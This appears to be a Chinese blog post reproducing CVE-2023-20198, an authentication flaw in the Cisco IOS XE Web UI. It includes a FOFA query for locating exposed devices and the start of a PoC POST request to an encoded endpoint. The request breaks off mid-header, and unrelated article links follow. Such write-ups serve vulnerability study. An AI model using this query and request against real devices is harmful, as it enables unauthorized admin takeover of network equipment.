Cisco IOS XE Web UI 权限提升漏洞复现(CVE-2023-20198)

0x01 产品简介

Web UI 是一种基于GUI的嵌入式系统管理工具,能够提供系统配置、简化系统部署和可管理性以及增强用户体验。它带有默认映像,因此无需在系统上启用任何内容或安装任何许可证。Web UI 可用于构建配置以及监控系统和排除系统故障,而无需CLI专业知识。

0x02 漏洞概述

当Cisco IOS XE 软件的web UI暴露于互联网或不受信任的网络时,未经身份验证的远程攻击者可以利用该漏洞在受影响的系统上创建具有15级访问权限的帐户。攻击者可以利用该帐户来控制受影响的系统。

利用条件需要启用HTTP Server或者HTTPS Server。

0x03 影响范围

启用了Web UI 功能的Cisco IOS XE

0x04 复现环境

FOFA:

body="<script>window.onload=function(){ url ='/webui';window.location.href=url;}</script>"

0x05 漏洞复现

PoC

POST /%2577eb%2575i_%2577sma_Http HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Content-Type: application/x-www-form-urlencod

相关推荐

最近更新

  1. TCP协议是安全的吗?

    2024-05-02 05:54:04       16 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-05-02 05:54:04       16 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-05-02 05:54:04       15 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-05-02 05:54:04       18 阅读

热门阅读

  1. C++中的指针详解

    2024-05-02 05:54:04       10 阅读
  2. iOS 获取到scrollView停止拖动时候的速度

    2024-05-02 05:54:04       9 阅读
  3. Linux内核常用调优参数

    2024-05-02 05:54:04       8 阅读
  4. 移动应用开发:Android vs iOS平台的选择与挑战

    2024-05-02 05:54:04       6 阅读
  5. 【C++之二叉搜索树】

    2024-05-02 05:54:04       13 阅读
  6. nginx配置tcp长连接实现集群

    2024-05-02 05:54:04       12 阅读
  7. Android UI:动画:视图动画

    2024-05-02 05:54:04       12 阅读
  8. 力扣501,二叉树中的众数

    2024-05-02 05:54:04       11 阅读
  9. CocoaPods:iOS项目依赖管理的利器

    2024-05-02 05:54:04       9 阅读
  10. 【刷爆力扣之637. 二叉树的层平均值】

    2024-05-02 05:54:04       10 阅读
  11. 2.DNS同时使用TCP和UDP协议?

    2024-05-02 05:54:04       10 阅读
  12. WPF之textbox输入框

    2024-05-02 05:54:04       7 阅读